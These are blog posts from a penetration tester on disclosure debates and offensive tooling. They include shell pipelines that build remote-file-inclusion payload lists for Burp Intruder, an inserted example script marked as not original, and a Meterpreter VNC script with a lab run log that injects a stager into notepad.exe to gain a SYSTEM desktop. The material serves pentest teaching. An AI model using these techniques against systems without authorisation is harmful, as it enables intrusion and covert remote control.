Room362.com

Blatherings of a security addict.

Vuln Disclosure Summarized


I have an admittedly limited view of the exploit dev world. However, from what I’ve seen, devs have very few options (please correct me if I’m wrong):

Responsible Disclosure

  • Direct Contact => depending on the size of the vendor and their view on security, this could result in anything from a simple thanks, a reward, to a court hearing.
  • Exploit Broker => possibly sell, possibly not, depends on the broker. The vuln could die on the table or be stolen due to too much information being given during negotiations. This route has the same financial risk as direct contact, but a lot less risk of getting sued.
  • ZDI (or other vuln clearing house) => “instant” cash, but admittedly less than an Exploit Broker could possibly get, based on the financial risk to ZDI. Close to zero risk of court time (they may come after you for selling the exploit), and a lot less financial risk since (IIRC) they pay up front. But then the vulns go to also-undisclosed parties, potentially the highest bidder, which is probably not the vendor.
  • “other” secretive groups who share vulns for different reasons…
  • Just to friends => No cash, no judicial risk, but you do risk them stealing/selling your exploit.

Full Disclosure

  • Posting it to the web for all to see/use => Possible court time, but the definite upside is the vendor is forced to react. A very quick way to make enemies.
  • Releasing at a conference => Probable court time.

No Disclosure

  • Keeping it to yourself => Working under the assumption that you’re the only one who has found that same bug is still semi-relevant due to the incredibly small size of the exploit dev community. However, as Dave said, they’ll be toasting to their sleeping dead 0days some day.

No More Free Bugs

  • My stance on this is split: while I think people should get paid for their work, I relate this movement to mowing someone’s lawn and then ringing their doorbell and asking for money. However, I’m sure Robert Graham’s punch-in-the-face metaphor also works.

Like I have stated above, I am far and away a newbie to the vuln disclosure world, and this debate has been going on since before I owned my own computer, but with the brilliant minds working at it, why doesn’t anyone offer up a solid solution to it?

My solution? Create a standard, something that we all abide by. I know as hackers we rebel against such things, but in the interest of getting better security out there (yes, that’s what we are here for, right?…. right?) we should really work together on this. What sounds right?

I mean, what is the right way to approach someone whose lawn you’ve mowed for the work you have done? Maybe free for open source projects, and a price based on exploitability and market share of the affected product?

Reference:

Vuln Trading Markets and You by Michal Zalewski (lcamtuf):
=> http://lcamtuf.blogspot.com/2010/04/vulnerability-trading-markets-and-you.html

Vuln Disclosure is Rude by Robert Graham:
=> http://erratasec.blogspot.com/2010/04/vuln-disclosure-is-rude.html

No More Free Bugs movement by Charlie Miller, Alex Sotirov and Dino Dai Zovi:
=> http://trailofbits.com/2009/03/22/no-more-free-bugs/

Dailydave Post by Dave Aitel:
=> http://lists.immunitysec.com/pipermail/dailydave/2010-April/006100.html

Practical Exploitation


Practical Exploitation is going to be me, explaining things in the way that I see the world, on the best medium for what I’m explaining, be it a short blog blurb, a video of me, a video of a desktop, or just audio. There is no schedule that I’ll be sticking to, but I will guarantee you 3 things:

  1. If you want it explained and it has to do with infosec or hacking (I’ll do my best on the hardware side), it will be on the show. Be it a white paper that you don’t have time or want to decrypt, a tool you can’t figure out, or just something you want to learn more in-depth. That’s what it’s for.
  2. No fluff, I’ll get straight to how you use it or can understand the topic.
  3. If your bullshit flag goes up for even an instant, call me on it, and I’ll either explain why I said what I did, or apologize and correct myself. You can email, tweet, PM, IM, ask a question on the tumblr site, or just haul off and punch me at a con. Either way, please take the time to tell me I’m wrong and why.

It launches today. I’ll start with topics that I know cold, then move on to white papers that I thought were interesting but haven’t read yet, hopefully intermingling anything you want to learn about.

http://www.practicalexploitation.com/

and email: questions at the same domain.

or call: (503) 406-8249

P.S. Room362.com and Mubix Links aren’t going anywhere. If anything they will probably start getting updated more. Room362 with stuff I cook up, as always, and Mubix Links with anything I find interesting on the web.

@RSnake ’s RFI List in Burp Suite


First of all, get Robert @RSnake Hansen’s RFI list here:

http://ha.ckers.org/blog/20100129/large-list-of-rfis-1000/

It’s a great list, but as soon as I saw it, I was like.. hmm.. how can I use that? Well, being that I am a Burp fan, I parsed the .dat with the following line:

```bash
cat rfi-locations.dat | grep -v "^#" | awk -F '?' '{print $1}' | sort -u > rsnake_list.txt
```

This pulls his list down to 906 entries which you can load into Burp and hammer away with Intruder. If it pops any of them, not only have you better identified what is running on the site, but you might have just found RFI.

But I wanted to take this a step further:

The OSVDB archive allows you to download their entire database of vulnerabilities (after signing up for an account). I downloaded the CSV version so that I could parse it similarly to how I did RSnake’s. However, it definitely wasn’t that easy.

I downloaded osvd-csv.latest.tar.gz, extracted it and ran the following:

```bash
# Note: the second stream editor call is "sed", not "set"
cat * | grep -i "remote file inclusion" | grep -v ",0$" | awk -F "," '{print $13}' | sed 's/^"//' | sed 's/"$//' | sort -u > osvdb_rfi.txt
```

Which got me close. About 3 hours of manual editing after that and I had another list of ~1750 possible remote file inclusions. Is this a foolproof way of getting every possibility from the database? Definitely not, but it’s close, and I’d love to see someone modify and tweak my bash line to get it even closer. (Or find a completely different way.)
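The two pipelines above, the RSnake .dat one and the OSVDB CSV one, reworked as an added example (not code from the original post) into functions that read from stdin, so they can be checked on constructed input before being pointed at the real files. The sample lines, the function names and the 14-column layout of the CSV (title in field 2, path in field 13, flag in the last field) are assumptions made for the demonstration:

```shell
#!/bin/sh
# Added example, not from the original post: reusable versions of the two
# list-building pipelines, reading from stdin so they can be tested on
# constructed input before running them on the real files.

# Constructed sample in the shape of rfi-locations.dat: '#' comment lines and
# "path?param=" entries, some sharing a path.
SAMPLE_RFI_DAT='# RFI locations (constructed sample)
/modules/example/index.php?page=
/modules/example/index.php?file=
/skins/demo/header.php?skin=
# another comment line
/lib/include.php?dir='

# Constructed sample in the (assumed) shape of the OSVDB CSV export: the title
# is field 2, the affected path is field 13 and the last field is the flag the
# original pipeline filters with grep -v ",0$". No quoted field here contains
# a comma; a row that does would shift field 13 with a plain comma split.
SAMPLE_OSVDB_CSV='1,"Remote File Inclusion in demo app",x,x,x,x,x,x,x,x,x,x,"/demo/include.php?p=",1
2,"Not an RFI at all",x,x,x,x,x,x,x,x,x,x,"/other.php",1
3,"Another remote file inclusion",x,x,x,x,x,x,x,x,x,x,"/demo/include.php?p=",1
4,"remote file inclusion (flag 0)",x,x,x,x,x,x,x,x,x,x,"/skip/me.php?x=",0'

# rfi-locations.dat -> unique paths without the query string, one per line,
# ready to load as a Burp Intruder payload list. Blank lines are skipped.
rfi_paths() {
    grep -v '^#' | awk -F '?' 'NF {print $1}' | sort -u
}

# OSVDB CSV -> unique field-13 paths for rows whose title mentions remote file
# inclusion (case-insensitive) and whose last field is not 0. The sed call
# strips the double quotes that surround the path field.
osvdb_rfi_paths() {
    grep -i 'remote file inclusion' | grep -v ',0$' \
        | awk -F ',' '{print $13}' | sed 's/^"//; s/"$//' | sort -u
}

# Line count of a list, trimmed so it reads the same on BSD and GNU wc.
count_entries() {
    wc -l | tr -d ' '
}

# Stand-alone run: print both lists and their sizes, as a sanity check before
# pointing the functions at the real rfi-locations.dat and OSVDB files.
printf '%s\n' "$SAMPLE_RFI_DAT" | rfi_paths
printf '%s\n' "$SAMPLE_RFI_DAT" | rfi_paths | count_entries
printf '%s\n' "$SAMPLE_OSVDB_CSV" | osvdb_rfi_paths
printf '%s\n' "$SAMPLE_OSVDB_CSV" | osvdb_rfi_paths | count_entries
```

On the real files the calls become `rfi_paths < rfi-locations.dat > rsnake_list.txt` and `cat * | osvdb_rfi_paths > osvdb_rfi.txt`. The one caveat worth keeping in mind is that `awk -F ','` splits on every comma, including commas inside a quoted title, so any such row in the export lands on the wrong field; counting the output against the number of matching rows is a quick way to spot that before the manual editing pass.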

Update on 2010-02-01 14:17 by Rob Fuller

RSnake has updated his list, same link, same file name with about 2300 RFIs now.

Security (CAN BE) an ART Not a SCIENCE


This is far from a new idea; however, it’s not something that is easily provable. So I had an idea this morning and posed the following question on Twitter:

You know what I got in return? A resounding “No” from everyone (well, I had one outlier, but who doesn’t when you are trying to apply science to prove art). I challenge you to name another non-artistic career that people are so passionate about that they would stay in it even if they won the lottery.

Here are a few that I would like to highlight:

@schuetzdj

@TomSellers

@ethicalhack3r

@dookie2000ca

This was a somewhat surprising outcome. See a trend? Most people wanted to quit their jobs, and start their own infosec company. Why is this? Is it just “The American Dream” or is it because they are unhappy with the current people in leadership? Or is it simply the fact that they are hindered from actually pursuing and learning hacking/security at work? The world may never know, but I do implore firms to look at the retention rate of their actual talent. (No, I don’t buy into the No Infosec Peep left behind bull).

There is a rumor that Google has a practice: 2 hours a day, you (an employee of Google) are REQUIRED to work on a project of your own that is in no way indebted to or owned by Google, even after completion. I can imagine the above answers would change if that were the case where they worked, if their employers fostered learning.

As a result of Infosec / Hacking being an art, do we have our prima donnas? Of course. But do we also have our Van Goghs and Michelangelos? Definitely.

But, time for a bit of a reality check:

@daveshackleford

Ya, you have NO idea what you would really do with millions of instant cash. I think the number is some 80% of lottery winners go BANKRUPT in the first 10 years. This is because you, and EVERYONE you have ANY connection to, goes absolutely crazy. To the point that there are lottery winner support groups.

However, the fact that people say it now, shows that they at least have the passion for the art. (or are just fronting)

Here are some honest answers to even out the tide:

@shmoosr

@Bolster

@andrewsmhay

In conclusion, I believe that hacking is a science, until passion adds the artistic fire to the mix. At least that’s what I think, draw your own conclusions.

(That’s another thing I love about this field, you are constantly challenged to draw your own conclusions, to think, to learn, to improve, to be… better)

Grmn00bs Podcast


I was recently on the grmn00bs podcast, I had a great time, and I can’t wait to see who they pick up next on their series:

grmn00bs podcast: episode 9

Update Archive.org Link

“When they were n00bs Series”

Show Notes:

  • hak5 is one of the original security shows. Rob has been featured on several segments.
  • Twit Netcast Network with Leo Laporte is another show that’s been around for a while.
  • Security Tube is the Youtube of security videos. This is where I’m at when I should be working. You might even find some GRM n00bs stuff rattling around there.
  • The Academy Pro is another excellent place to go for security training.
  • milw0rm has lots of exploits. It’s a good place to check out some old papers to brush up on security history.
  • NewOrder is another resource to get abreast of lessons learned in the past.
  • Jasager is the “Yes Man” Rob talks about in the show.
  • Chris Gates’s book list has some good ideas for security reading.
  • Syngress is a publisher of security texts. They have all my money.

Donate to Johnny Long!

Linked in to Twitter


If you hadn’t noticed, LinkedIn has started allowing you to link your Twitter account to your LinkedIn account. So, I didn’t know this (since I opted out), but apparently LinkedIn will kick your status updates to Twitter… like when you get a new job…

Privacy settings out the window! Woohoo for Web 2.0!

Meterpreter Tunneling and VNC Revamped


So yesterday (December 14th, 2009) HD Moore posted a tweet with a pic of the new VNC meterpreter script that he wrote:

Looking at the script, I noticed that it created a new connection (two connections outbound). Well, it was the perfect excuse to take the newly refurbished portfwd command for a spin.

https://github.com/mubix/stuff/blob/master/metasploit/vnc_oneport.rb

Or you can get it via SVN at revision 7872.

By creating a bind payload instead of a reverse connect, we can have the payload listen locally on the target. Then with the portfwd command (just like on your home router) we forward a local port on our side to the bound port on the remote host’s loopback, and connect to that freshly forwarded port as if we were doing everything on the box itself, creating a new session and a nice beautiful VNC window.

Options:

```text
meterpreter > run vnc_oneport -h

OPTIONS:
-e <opt> The process to run and inject into (default: notepad.exe)
-h  This help menu
-l <opt> The local port to listen on via port forwarding (default: 5901)
-p <opt> The port on the remote host to bind VNC to (default: randomized)

meterpreter >
```

Example Run:

```text
[*] Meterpreter session 1 opened (192.168.92.103:4444 -> 192.168.92.113:1038)

meterpreter > run vnc_oneport
[*] Creating a VNC stager: RHOST=127.0.0.1 LPORT=1207
[*] Host process notepad.exe has PID 532
[*] Allocated memory at address 0x00640000
[*] Writing the VNC stager into memory...
[*] Running Payload
[*] Creating a new thread within notepad.exe to run the VNC stager...
[*] Starting the port forwarding from 5901 => TARGET:1207
[*] Local TCP relay created: 0.0.0.0:5901 <-> 127.0.0.1:1207

meterpreter > [*] VNC Server session 2 opened (127.0.0.1:56893 -> 127.0.0.1:5901)
Connected to RFB server, using protocol version 3.3
No authentication needed
Desktop name "VNCShell [SYSTEM@WORKSTATION1] - Full Access"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
  Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
  Using shared memory PutImage
Same machine: preferring raw encoding
ShmCleanup called
[*] VNC Server session 2 closed.
meterpreter >
```

Note:

The forwarded port does not close even if the meterpreter session is ended, so use the following command to close the forward:

```text
meterpreter > portfwd delete -l 5901
[*] Successfully stopped TCP relay on 0.0.0.0:5901
meterpreter >
```

(Note to BT4 users: do an apt-get install vncviewer before using any of the vnc payloads in Metasploit)

The script utilizes just one of the millions of ways you can leverage ‘portfwd’ in your endeavors. But where it gets interesting is the fact that the delivery method for the payload never touches disk. That magic is all credited to HD though. What happens is a new process is created (notepad by default) and the newly created VNC bind payload is injected into it. But the beauty is that it’s doing local connections via the port forwarding, so all you see in TCPView is:

Now it’s definitely suspicious that Notepad has any connections at all, but you can use the option -e to provide any executable you wish, as long as it’s in the path for the system. For example, look at what’s running naturally already.

Plus, you would probably not be using port 4444 for a meterpreter session. But what I wanted to demonstrate with this script is the power of both meterpreter, and port forwarding.

Now it’s your turn to make it better. Take a look at the guts, see if anything will help you in your scripting.

Metasploit With Ruby 1.9.1


UPDATE: unless you take some additional steps, the ‘rvm 1.9.1’ command is only active for the current console session. See the site for details: http://rvm.beginrescueend.com/

This short tutorial is how to get Ruby 1.9.1 on BT4 or any other Linux distro with the tool ‘rvm’ (Ruby Version Manager).

The Metasploit team has put a lot of work into getting the framework to work well with 1.9.1 and still work with earlier versions. Here is a way that you can try out the new hotness, or just test whether all of the tweaks and modules you run work with the newer version of Ruby.

Metasploit with Ruby 1.9.1 from mubix on Vimeo.

Update on 2009-12-10 14:19 by Rob Fuller

I’ve replaced my video with a short shell script:

```bash
#!/bin/bash

# Install the Ruby Version Manager gem and its shell integration
gem install rvm
rvm-install
# Build Ruby 1.9.1 and switch the current shell session to it
rvm install 1.9.1
rvm 1.9.1
```

2009 Geek Christmas List


What’s on your list? Here is mine (in no particular order):

Number 1: iPhone compatible alarm clock with good sound

Number 2: iPhone car mount that charges and is compatible with aux cables

What’s on your list?